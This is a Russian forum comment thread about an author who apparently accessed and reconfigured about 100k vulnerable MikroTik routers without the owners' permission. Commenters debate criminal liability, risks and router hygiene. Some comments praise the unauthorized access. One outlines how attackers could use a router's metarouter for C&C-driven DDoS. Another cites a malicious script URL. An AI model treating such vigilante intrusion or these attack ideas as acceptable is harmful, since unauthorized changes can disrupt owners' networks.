                                  А вот подняли мэйлсервер с открытым релэем. Человек тут же попадает в блэклисты и не может работать. Это как, вмешательство в работу сетей или что? Человек же работать не может. Письма не посылаются, он терпит убытки из-за невозможности пересылать деловую корреспонденцию и т.п. С его точки зрения ему сознательно палки в колеса пихают. Разве нет? Тема очень очень скользкая. Сообщество профессионалов зачастую принимает разумные решения, которые большинство считает ущемлением или ограничением их прав. Всегда тяжело давать однозначную оценку подобным деяниям.
                                    0
                                    вмешательство в работу сетей или что? Человек же работать не может

                                    Вы прям все точно про РКН написали :). Но разве кто то что то доказал ?)

                                      0
                                      Вот про это неохота вообще писать. Тут УК РФ Статья 293. Халатность.
                                      0
                                      Тут надо разделять.
                                      Если пользователь попадает в блеклисты на чужом устройстве (не владелец) из-за внешних факторов (политика внешней компании, например).
                                      И если доброжелатель взламывает внутренний роутер, принадлежащий конечному пользователю (владелец).

                                      То есть реального скольжения на данном этапе нет. Автор поста несанкционированно, путём взлома попадает на конечное устройство, которым владеет пользователь и производит на нём махинации.
                                        0
                                        О. Какое отличное пояснение. Да я согласен, тут надо думать как интерпретировать события. Но все равно, разница существенная. В одном случае вмешательства как бы нет, но есть реальное противодействие. Во втором случае вроде есть вмешательство, но нет реальной помехи текущей работе. Как бы так описать то… Ну, в одном случае владельцу незапертого авто заблокировали выезд со двора положив поперек пути, ну я не знаю, бетонную чушку, в другом случае положили на сиденье записку, что мол двери стоит закрывать. Опять же да, примеры из реального мира не вполне описывают положение вещей, но на мой взгляд суть, всё таки, в возможном вреде от махинаций.
                                          0
                                          Скорректирую ваш пример:
                                          В одном случае у владельца блокиратор на колесе и квитанция под дворником, а в другом — вскрытая машина с запиской на сидении.
                                    0
                                    С этим как раз все просто:
                                    Статья 272 УК РФ. Неправомерный доступ к компьютерной информации

                                    1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации, —

                                    наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.

                                    2. То же деяние, причинившее крупный ущерб или совершенное из корыстной заинтересованности, —

                                    наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо арестом на срок до шести месяцев, либо лишением свободы на тот же срок.

                                    Т.к. оставлен кошелек с просьбой перевода денег и есть факт получения прибыли, то судья вполне может квалифицировать как «корыстную заинтересованность».

                                    P.S. Я сам за то чтобы бороться с уязвимостями, но вот выбранный путь вызывает вопросы.
                                      +1
                                      Вот именно.
                                      уничтожение, блокирование, модификацию либо копирование компьютерной информации

                                      Таким образом, даже установка майнера не попадает под статью 272 УК РФ.
                                      К слову, ПО не попадает под определение компьютерной информации, так что обновление прошивки тоже не вменить.
                                        0
                                        Это закон, тут не все так просто. Вот еще выдержки из 272 УК РФ

                                        1. Неправомерный доступ к компьютерной информации — это не санкционированное собственником или иным законным пользователем информации проникновение к ней, в том числе с возможностью ознакомления, которое позволяет распоряжаться этой информацией (уничтожать, блокировать, модифицировать и т.д.), и создающее опасность как для самой информации, так и для интересов собственника или иного законного пользователя.

                                        3. Предметом неправомерного доступа к компьютерной информации является охраняемая законом компьютерная информация, под которой понимаются сведения о лицах, предметах, фактах, событиях, явлениях и процессах, находящиеся на машинном носителе, в ЭВМ, системе ЭВМ или их сети.

                                        Модификация — это любая переработка содержания исходной информации (например, введение новых данных, уничтожение части информации в файле и т.п.).
                                        Под копированием компьютерной информации понимается воспроизведение данных при помощи компьютерного устройства с сохранением исходной информации.

                                          0
                                          ПО не является компьютерной информацией.
                                          Для защиты ПО используется авторское право, но совсем другая история.

                                          Конфиги в общем случае также не защищаются. Исключением являются только случаи, где данные способствуют коммерческой выгоде. Например, логин\пароль для доступа к Интернету, который в свою очередь используется для заработка. А логин\пароль для доступа к роутеру таковыми не являются. Во всяком случае, доказать это будет сложно.
                                            0
                                            Эммм… а чем же тогда является ПО? Любое ПО, насколько я понимаю, это код, хранимый и исполняемый на конечном устройстве. Код — это обычно текст. Текст, который хранится устройстве — это и есть компьютерная информация, нет?
                                              0
                                              Я думаю, тут граница очень расплывчатая, и при желании можно по-разному трактовать, ибо «информация это сведения/сообщения/данные» из 149-ФЗ — весьма туманное определение. Обычно к коду прилагаются какие-то конфиги или хотя бы константы, которые можно при желании трактовать как данные. Кроме того, будет ли информацией дамп псевдослучайных байтов из /dev/random? А если он использовался в качестве гаммы для «настоящей» информации? А если кто-то постфактум заXORит шифротекст из нее и данных соответствующей длины и таким образом «превратит ее в гамму»? А если брать не случайную последовательность из /dev/random, а сам машинный код программы? Четкая граница между такими тонкими деталями вряд ли будет проведена в каком-нибудь законе, можно максимум смотреть на прецеденты.
                                                0
                                                Закон нужно читать буквально: если написано что читать и изменять нельзя, — значит нельзя; если написано, что предусмотрено наказание, — значит предусмотрено. Другое дело, что именно подразумевается под объектом права, — может определяться другим законом.
                                              0
                                              У меня нет юридического образования. Думаю Вам лучше обратиться к специалистам, который грамотно распишет почему тут применима 272 статья.
                                                0
                                                > Конфиги в общем случае также не защищаются.

                                                Если интересно, были случаи посадок за смену IMEI на телефоне.

                                                > доказать это будет сложно

                                                … но не очень то и нужно™. Вы думаете судье очень хочется вникать что там в вашем компюктере за пароли? Ей скучно и у неё ещё 30 дел сегодня. Статистику оправданий по уголовным делам сами найдёте.
                                        0
                                        Вечная проблема как классифицировать то или иное поведение примерами из реального мира. Вот если человек порты сканирует, это он ходит вокруг дома и смотрит на него, или стоит у двери с набором отмычек и пытается замок взломать? Где грань пролегает? И опять же, вот у меня во дворе валялась машинка с незапертой дверью, некий гражданин обнаружил это, сообщил в управу, вызвали эвакуатор и утащили на охраняемую городскую стоянку.Подергал дверь, понял что что-то не так и проявил гражданскую сознательность. С другой стороны, тот кто вышел утром и не нашел машины, соответсвенно, потерял время, нервы и деньги на её поиск и добычу со стоянки. Вот это было хорошее или плохое дело?
                                        По хорошему, для дела, тем более уголовного, действительно нужна некая материальная составляющая. Какое-то извлечение прибыли или злонамеренное причинение ущерба. В иных случаях прокурору есть чем ещё заняться.
                                          0

                                          По хорошему закон и государство вообще не должны в эту сферу лезть; гонка меча и щита и без государств работала, и будет работать в этой сфере лучше, чем могло бы работать что либо ещё.

                                        0
                                        Именно эта уязвимость.
                                        В нашей стране существует поговорка «Был бы человек, а статья найдётся».
                                        У нас есть статья 272 УК РФ. Но для её применения необходимо доказать преступный умысел.

                                        Вот вы видите, что автомобиль стоит с открытым окном, а на улице осадки. Если вы его накроете полиэтиленом, то к вам нельзя применить даже самоуправство (19.1 КоАП РФ).
                                        Вот я вижу эти открытые окна, закрываю чем могу и пытаюсь сообщить хозяину…

                                        И вот мне интересно, а как тогда работают иследователи в области безопасности, выдавая информацию о количестве поражёных узлов? Их же не сажают пачками?
                                          +1
                                          Вы бесспорно делаете благое дело, и помогаете сообществу.

                                          Но вы не подумали, что если один или несколько из этих сотен тысяч микротиков имеет доступ к себе только за пределами локальной сети и установлен там, где доступ администратора физически затруднён. Своими модификациями вы можете нанести вред или остановить работу какой либо части сети.

                                          Кажется, что в такой сложной области как администрирование чужой сети (а если сравнивать с автомобилем — то выдворение из него бомжа, когда вы увидели что он пытается влезть в чужую, как вам показалось, машину. Или, например, перепарковывать автомобили, взламывая сигнализации, на правильное место, устраняя чужие нарушения) — правильнее будет всеми возможными способами уведомлять владельца, а не заниматься самоуправством?
                                            +2
                                            Я это предусмотрел и такие устройства я пропускал, оставив только комментарий в фаерволе.
                                            Всего найдено мною дырявых устройств 179к, из которых я смог «закрыть» только чуть больше 100к. В остальных я боюсь навредить сильнее.
                                              +2
                                              Простите за занудство.

                                              Правильно ли я вас понимаю, что вы анализировали текущий конфиг и если не находили в нём признаков необходимости доступа из вне — закрывали доступ из вне?

                                              Если да, то как вы определяли, что доступ из вне не понадобится в будущем?

                                              Я вижу логическую ловушку в ваших действиях. А учитывая, что вы анализировали такое большое количество устройств и делали это некими эвристиками (явно не в ручную), предположу, что вы не могли предусмотреть все варианты развития событий (хотя бы потому, что вам неизвестны намерения администраторов и их планы по администрированию сети на будущее).

                                              Я бы сильно расстроился, если бы мой маршрутизатор без моего ведома кто-то бы трогал. Даже если этот кто-то мне помог, как ему кажется. Надеюсь, что это всего лишь моя нудная болтовня.
                                                0
                                                90% без настроенного фаервола с белым ip уже кем-то «потроганы». А остальные 10% обязательно в ближайшее время найдут.

                                                Так соответственно Вы предпочтёте чтобы я его «потрогал» оставив Вам весь его функционал и доступ из локалки или хакер, который заблокироует Вам на него доступ совсем, плюс создаст вирусный трафик?
                                                  +1
                                                  Ваша мысль сводится лишь к силе (количеству) моего расстройства. В случае с хакером его просто будет больше.
                                                    0
                                                    я из любопытства оставлял голые железки с белой статикой, менял только пароль на учётку админа, в логах через два-три дня огромное количество попыток брутфорса пароля с различных ip.
                                                    • UFO just landed and posted this here
                                                    +4
                                                    И в качестве шутки...

                                                    За всё время мне написало не более 50 человек…
                                                    а остальные не смогли попасть на свои роутеры и увидеть ваши сообщения)
                                                  0
                                                  Вы явным образом проникаете внутрь в общем то закрытого автомобиля, заводите его и отгоняете на охраняемую автостоянку. Это не «пакетиком накрыл» это уже угон. Если вы этого не понимаете — послушайте доброго совета — не делайте так пожалуйста. Добрыми делами прославиться нельзя ©. Какими бы ни были ваши намерения — вы сильно рискуете нарваться на в общем то адекватную реакцию. И в лучшем случае вам придется долго и нудно объяснять что мол я просто Робин Гуд шел мимо решил помочь. Вам то надо?

                                                  PS: Ну и уж если вам так хочется поиграть в доброго робинагуда не смотря на возможные последствия — OK. Но делайте это с умом. Что-то глупее, чем трубить о своих подвигах на хабре придумать IMHO сложно. О какой безопасности разговор :-?
                                                    –1
                                                    Даже автомобиль можно взять на ответственное хранение по закону, если его владелец очень давно не появлялся.
                                                      0
                                                      OK. Поступайте как считаете нужным. Предупрежден — значит вооружен. Удачи в бою!
                                                        0
                                                        Взять — можно. А взять, вскрыть и начать ковыряться в движке, шариться по личным вещам, сменить замки, менять регулировки кресла так, как удобно вам, а не владельцу авто, который давно не появлялся — нельзя.
                                                  +5
                                                  Спасибо вам за ваши труды!
                                                  В одиночку боретесь с несовершенством этого мира!
                                                  У меня нет Микротика, но дыры в софте и даже в железе — это бич современности. Ваши советы распространяются на многие устройства. Принципы защиты те же.
                                                    0
                                                    А чего на mum не пустили? В другом городе или места закончились?
                                                      +1
                                                      1. Я в Сибири, а МУМ в Москве
                                                      2. Я не так давно сменил работу и на отпуск ещё не заработал
                                                      3. Работодателю пофиг на микротик, чтобы просить командировку.
                                                      +1
                                                      Зачем доступ извне закрывать на чужом устройстве? Достаточно просто влить свежую прошивку. Причем некоторые недоброжелатели после получения доступа к роутеру именно это и делают, чтобы управление никто эксплоитом не забрал назад.
                                                        +1
                                                        Есть специфика при обновлении со старых версий, если кто не использовал бриджи для объединение, а использовал master\slave, то произойдет автоматическая настройка, которая не учитывает все моменты и может привести к проблемам, вроде также это касается VLAN.
                                                          +1
                                                          Потому что я несколько раз окирпичивал микротик нажатием кнопки «обновить». Причём один раз на курсах MTCNA.
                                                          Если закрыть порты, то человек как минимум через mac-winbox может получить доступ к нему.
                                                            +2
                                                            Два года назад обновился через winbox, — тик больше не загрузился. 2 рабочих бекапа только вырубали его. Пришлось руками восстанавливать настройки на новой прошивке.
                                                              0
                                                              Были прецеденты?
                                                                +1
                                                                Были. Пришлось сбрасывать через netinstall.
                                                              +2
                                                              Давайте обратимся к первоисточникам. А именно — Уголовному Кодексу. По утверждению автора он из Сибири поэтому смотреть будем в УК РФ. Я намеренно не буду вдаваться в наказания — для этого есть соотв. органы. Я буду лишь прикидывать, что можно в принципе повесить на нашего Робина Гуда. Пойдем по порядку.

                                                              УК РФ Статья 272. Неправомерный доступ к компьютерной информации

                                                              Часть 1 гласит: «Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации»

                                                              Попадаем? Вполне. Охраняемая информация на лицо. Модификация, блокирование — запросто. Замечу — в статье ни слова не сказано о злом или каком-либо ином умысле. Получил неправомерный доступ и пошурудил там палкой? Добро пожаловать на ковер! Как минимум — будем разбираться.

                                                              Часть 4 гласит «Деяния, предусмотренные частями первой, второй или третьей настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления,»

                                                              Об этом мы поговорим чуть позже. Но не могу не удержаться от «наказываются лишением свободы на срок до семи лет

                                                              УК РФ Статья 273. Создание, использование и распространение вредоносных компьютерных программ

                                                              Часть 1 гласит «Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации»

                                                              Я не думаю, что автор лечил больных зверят каждого персонально руками. Скорее было нарисовано не суть важно какое ПО, которое сканировало сеть в поисках микротиков, автоматически пробивало их через Феерический Баг (tm), после заходило в управляющий интерфейс (telnet/ssh/web) и выполняло Добро. Это уже, господа, вполне себе попадает под создание и использование программ заведомо предназначенных для несанкционированной модификации.

                                                              Часть 3 гласит «Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет. Да. Опять не удержался.

                                                              УК РФ Статья 274.1. Неправомерное воздействие на критическую информационную инфраструктуру Российской Федерации

                                                              В ней прекрасно Все! Инкапсулированы вышеназванные статьи 273 и 273 но с куда более интересными сроками. Причем тут мы спросите вы? А притом, что

                                                              Статья 2. Основные понятия, используемые в настоящем Федеральном законе

                                                              6) критическая информационная инфраструктура — объекты критической информационной инфраструктуры, а также сети электросвязи, используемые для организации взаимодействия таких объектов;
                                                              7) объекты критической информационной инфраструктуры — информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления субъектов критической информационной инфраструктуры;
                                                              8) субъекты критической информационной инфраструктуры — государственные органы, государственные учреждения, российские юридические лица и (или) индивидуальные предприниматели, которым на праве собственности, аренды или на ином законном основании принадлежат информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления, функционирующие в сфере здравоохранения, науки, транспорта, связи, энергетики, банковской сфере и иных сферах финансового рынка, топливно-энергетического комплекса, в области атомной энергии, оборонной, ракетно-космической, горнодобывающей, металлургической и химической промышленности, российские юридические лица и (или) индивидуальные предприниматели, которые обеспечивают взаимодействие указанных систем или сетей.

                                                              Улавливаете? Любой самый вшивый ФГУП при желании можно притянуть за уши к этому определению.

                                                              Выводы… А какие тут выводы? Если с масштабами автор не приврал — IMHO пора менять город, страну, континент и пол. Желающие отплатить вам добром на добро могут прийти с минуты на минуту.
                                                                0

                                                                И что вы хотите этим сказать?
                                                                Вы уверены, что автор делал это все сидя у себя дома со своего компа? И что писал эту статью тоже оттуда же? То, что он нарушает закон он прекрасно понимает, поэтому и пишет что не может выступить на конференции и сорвать заслуженные апплодисменты, приходится вот так скрываться.

                                                                  +1
                                                                  > То, что он нарушает закон он прекрасно понимает, поэтому и пишет что не может выступить на конференции и сорвать заслуженные апплодисменты, приходится вот так скрываться.

                                                                  Эмм… Это наверное такой тонкий юмор, да? Оценил.

                                                                  >> А чего на mum не пустили? В другом городе или места закончились?
                                                                  > 1. Я в Сибири, а МУМ в Москве
                                                                  > 2. Я не так давно сменил работу и на отпуск ещё не заработал
                                                                  > 3. Работодателю пофиг на микротик, чтобы просить командировку.
                                                                  0
                                                                  Вы из тех, кто подает в суд на врача, который сломал ребро спасая жизнь?
                                                                    +4
                                                                    Господа, вы вообще просчитываете возможные пути развития событий?

                                                                    Вот представьте банальная ситуация. Робин Гуд ошибся и принес добро не туда. В результате он оставил систему X без внешнего управления. С его точки зрения это добро. Однако с точки зрения горе-админа[ов] системы — это большое зло т.к. система перестала работать. К тому же Робин помимо самого добра ещё и накосячил в процессе. Не специально конечно. Но тем не менее. Система не то, чтобы сильно важная но вполне может поднять волну. Я не просто так привел статью 274.1.

                                                                    Админам, как крайним, конкретно прилетело по шапке. И это только начало. Они, не будучи дураками, стараются прикрыть свой зад. Им глубоко плевать на Робина, его идеи, пасхалки и всю остальную хрень. Сейчас им интересен повторюсь только свой, личный зад. Как следствие все версии сводятся к внешнему вражескому вторжению. Начинают искать виновного. Поднимают все возможные логи. Естественно находят следы Робина. Проводят консультации с людьми в теме. Обнаруживается, что Робин уже успел засветиться ещё на N-м количестве хонепотов т.к. нес добро всем без разбору. Коррелирующие друг с другом данные накапливаются. Круг сужается. А потом кто-то обнаруживает подарочек на хабре в виде этой заметки. Твоюжмать да так не бывает! Робин, ты? Пробивают. А что — похож. Вот… молодец. Ну иди сюда. Обсудим.

                                                                    Если у Робина карма так себе то будет именно так, как я описал выше. Не верите? Ваше право. Видимо, истории с провалом реальных злоумышленников ничему вас не учат. Обязательно нужно все проверить на своей шкуре. А жаль. Учитывая заявленный масштаб вероятность попасть не в то место и не в то время отнюдь не нулевая.

                                                                    PS: Выраженные же Робину респект и подбадривающие улюлюканья кулхацкеров никак не помогут. В тот момент у него будут совсем другие проблемы. Останется только сокрушаться над собственной глупостью.

                                                                    PPS: Тем же, кто совсем не верит и не читает новостей — описанный выше сценарий я практически списал с Mirai (ссылка тоже откуда то с Хабра). Почитайте на досуге не пожалеете. Триллер хоть куда. Конечно, масштабы не те, мотивы отличаются. Но развитие событий более чем реальное. Пацаны из Mirai это знают как никто другой.
                                                                      0
                                                                      Прекрасно представляю. Представьте и вы ситуацию, когда из за подобного бага в роутере, или чего то еще, ломают весь ваш продакшн, в течении недели тихонько выливают базу со всеми юзерскими данными, крадут ваш код, потом пытаются шантажировать, продают код другим заинтересованным лицам, которые названивают пользователям со своими услугами, и ваши пользователи сначала на вас жалуются, а потом уходят. Дополните картину красными от всего этого жопами админов и разрабов, которые искали как же смогли взломать ваш прод, который казалось закрыт от всего, а потом исправляли. Так что, я бы предпочел, чтобы похожий «добрый фей» тихо-мирно исправил баг и написал. Мы бы даже выслали ему одну-две месячных зарплат московского сеньора (были случаи) И даже предпочел чтобы у нас прод валялся пол-дня, если «фей» таки накосячил. Потому что это не пошло нам на пользу ни с одной стороны, т.к опыт почти не применим, а денег потеряли и проблем прибыло очень много.

                                                                      Но я так и не понял, почему вы так переживаете за автора
                                                                        +2
                                                                        > Но я так и не понял, почему вы так переживаете за автора

                                                                        За автора я не переживаю. Мавр свое дело сделал, Мавру остается только ждать и молиться. Я хочу разбавить восторженный восторг реалистичностью. Чтобы те, кто это молча читают, задумались и не повторяли в будущем чужих дурацких ошибок.
                                                                          +2
                                                                          Если я через полгода ещё одну статью не забабахаю (например о White Hat в России), то значит всё плохо.
                                                                            0
                                                                            Если однажды
                                                                            Вдруг
                                                                            Меня не окажется вовсе
                                                                            в заповедной заветной тарелке
                                                                            твоего праведного сновидения
                                                                            знай-
                                                                            Неуловимые мстители настигли меня.


                                                                            Черт, до слез! (с)…
                                                                  +2

                                                                  Автору респект!


                                                                  Поделитесь вашим опытом как ещё хакеры могут использовать Mikrotik.

                                                                  Ещё можно поднимать виртуальные серверы metarouter, заливать туда урезанный Линукс, и он уже спокойно ходит на CC сервер, получает задание например на ddos и льёт весь доступный канал. Для целей ddos, будь я злоумышленником, то точно не использовал socks/vpn или даже dns amplifier. Можете проверить, много ли стоит metarouterов? И ведь если там Линукс, он имеет полный доступ к локальной сети, и к тому же mikrotik-у изнутри, если ещё не сменился пароль и. Администратора.

                                                                    0
                                                                    Так же загляните в Environment
                                                                    Так быть не должно


                                                                    Есть определенные сомнения, что наличие окружения связано со взломом операционной системы. Подтвердите или опровергните свою теорию.
                                                                      0
                                                                      Экспериментальным путём. Один из загруженных скриптов оставил такой след в окружении. Сомневаюсь, что такое содержимое окружения как на скриншоте является результатом штатной активности пользователя.
                                                                        0
                                                                        Больше похоже на дефолтные настройки одной из прошивок release candidate. Нужно проверить.
                                                                          0
                                                                          Верно. Нашёл официальный источник. Убрал из статьи.
                                                                          Просто для меня это оказалось ниведомой фигнёй…
                                                                      0
                                                                      Свой вариант

                                                                      Сам ломал роутер Mikrotik через недавнюю уязвимость, так как человек который знал пароль давно уволился, а было необходимо внести изменения в конфигурацию. Взломал, настроил, обновил, пароль передал владельцу роутера.
                                                                        0

                                                                        Вспомнился Max Butler, который на заре хакерской карьеры аналогичным образом чинил людям уязвимые инстансы BIND :)

                                                                          0
                                                                          Лично мне Микротик не понравился, хотя опыт работы с этим производителем не большой.
                                                                          Делали в офисе WiFi сеть из двух микротиков, в итоге она то работает, то нет. Долго пытались понять, пришли к тому что что-то с прошивкой. В итоге плюнули и купили другое оборудование.
                                                                          Вообщем по мне так проблемма в том что софту, что внутри крутится не уделяют нужного внимания.
                                                                            0
                                                                            Промахнулся.
                                                                              0
                                                                              Эх, все бы в этом ценовом так «не уделяли внимание», как MikroTik, которые все выпущенные железяки по 10+ лет поддерживают.
                                                                              0

                                                                              Гм, мой dhcp сервер, который стоит на бридже wan-tv (знаю, дико звучит, но без этого tv приставка не работает), последнее время стал выдавать айпишники на какие-то левые mac адреса. Интересно, не автор ли это случаем был? При этом фаерволл настроен, активность с этого бриджа разрешена только tv приставке. Интернет поднимается через l2pt с этого бриджа. Ничего в голову не приходит, как с этим бороться и как посмотреть активность с этих адресов.

                                                                                0
                                                                                Было бы неплохо соорудить какой то скрипт для «ъ» и выложить его на гитхаб, чтобы запустив его, можно было все проверить, выдать список найденных косяков и по возможности сразу исправить. Возможно многого хочу, а может уже есть такое.
                                                                                  0
                                                                                  Настраиваете тик, собираете настройки, указанные в статье, и планировщиком отправляете себе на почту (пишут, что значение переменной не может превышать 4096 байт) или смотрите онлайн.
                                                                                  –1
                                                                                  MikroTik — это неоправданно дорогущая игрушка. Сам лично сталкивался с десятками случаев несанкционированных настроек. Получал доступ при попытках сброса пароля. Дешевые бытовые роутеры и точки доступа оказались куда надежнее и деревяннее — парадокс.
                                                                                  Я скажу так: проблема не в роутерах MikroTik, а в самих владельцах этих роутеров, а также в недостаточной компетенции настройщиков и отсутствие единых стандартов.
                                                                                    0
                                                                                    А как автор получает доступ к устройствам для анализа? Сканом???
                                                                                    Зы. Две машины пришлось сбрасывать полностью, хакеры каким-то образом добавили пользователя 'createuser', который доступен только локально, кроме того, умудрились че-то напортачить с админом, которого перестало пускать ч/з winbox. Пришлось сбрасывать настройки кнопкой reset.
                                                                                      0
                                                                                      Свой вариант

                                                                                      Открыл 22 наружу. По глупости и по ТЗ. Юзвери пожаловались на медленный вифи. Снаружи подключиться не смог, приехал на точку, подключился, увидел в логах вагон попыток подключиться к 22-му порту. Точка тупо ушла в DoS, но пароль подобрать не успели. Сменил порт и ограничил белый список и было мне счастье. Было это еще в 2012-м.
                                                                                        0
                                                                                        В опросе не хватает пункта «Ломал сам» :)

                                                                                        Молодец, человек. Всё правильно делает.
                                                                                          +2
                                                                                          Спасибо вам большое! Вот уж не ожидал встретить доброго самаритянина Z399578297824 на Хабре. Можете в личку кинуть альтернативный способ отблагодарить? WMZ не пользуюсь.
                                                                                            0
                                                                                            Мне интересно насолько безопасен ихний родной DDNS, это ведь централизированая база устройств с уже настроенным удалённым доступом. Поэтому один 0-day и как минимм десятки тысяч устройств заражены.
                                                                                              0
                                                                                              А что тебе мешает nmap'ом найти все устройства с открытым портом 8728?
                                                                                              А их DDNS состоит из серийного номера. Более того далеко не у всех включен Cloud. Так уж искать по DDNS крайне не эфективная идея.
                                                                                              +1
                                                                                              Статья понравилась. Хоть роутер и чистый, но наблюдения интересные. Спасибо.
                                                                                                0
                                                                                                Хотелось посмотреть, что же там в u113.rsc, но ссылка gotan.bit:31415/01/u113.rsc не открылась, а whois пишет «gotan.bit не удалось проверить».
                                                                                                  0
                                                                                                  ИМХО все смешалось. Кони, люди… Есть железки Mikrotik которые обладают определенными ТТХ, а есть RouterOS с гибким функционалом, документацией и регулярными обновлениями. В одной организации доводилось ставить RouterOS на x86 машину — шикарно! >200 пользователей ходили в интернет, VPN для удаленных работал, балансировка между 2 провайдерами работала. Не могу сказать, что правила FW были какие-то замудреные. Просто запретил всем и все, а потом по необходимости открывал отдельные вещи (клиент-банки кривые, GPS-трекеры слали инфу о машинах и пр.). Так что Микротику как фирме огромное спасибо за крутой продукт аналогов которому (особенно в том-же ценовом сегменте) я не нашел. Итого: надо не дорого под небольшую нагрузку — Mikrotik, надо недорого с нагрузкой выше средней — RouterOS на обычный ПК, хочется чтоб прям ваще надежно и под большую нагрузку — HA-кластер, виртуалки на виртуалках RouterOS. Чем не вариант?.. Заодно в варианте 2 утилизируем ПК на которых манагерам западло работать ибо Win 10 не ставится.
                                                                                                    0
                                                                                                    Дык я не понял, домашний Mikrotik hAP надо проверять или нафиг он хакерам не нужен?
                                                                                                      0
                                                                                                      Если провайдер предоставляет белый IP, то надо. В принципе, если там стандартная конфигурация «из коробки», то должно быть всё ОК, но лучше проверить.
                                                                                                        0
                                                                                                        Ага, то есть если вместо белого IP — провайдерский NAT, то это крутая защита? Конфигурация из коробки.
                                                                                                          0
                                                                                                          Не совсем. NAT — это не средство защиты. Если в сети провайдера найдётся хакер, то он может и залезть на ваше устройство.
                                                                                                      0
                                                                                                      Спасибо большое!
                                                                                                        0
                                                                                                        Огромное спасибо автору! Лишний раз проверил свой Микротик, но к счастью ничего подозрительного не обнаружил.

                                                                                                        Only users with full accounts can post comments. Log in, please.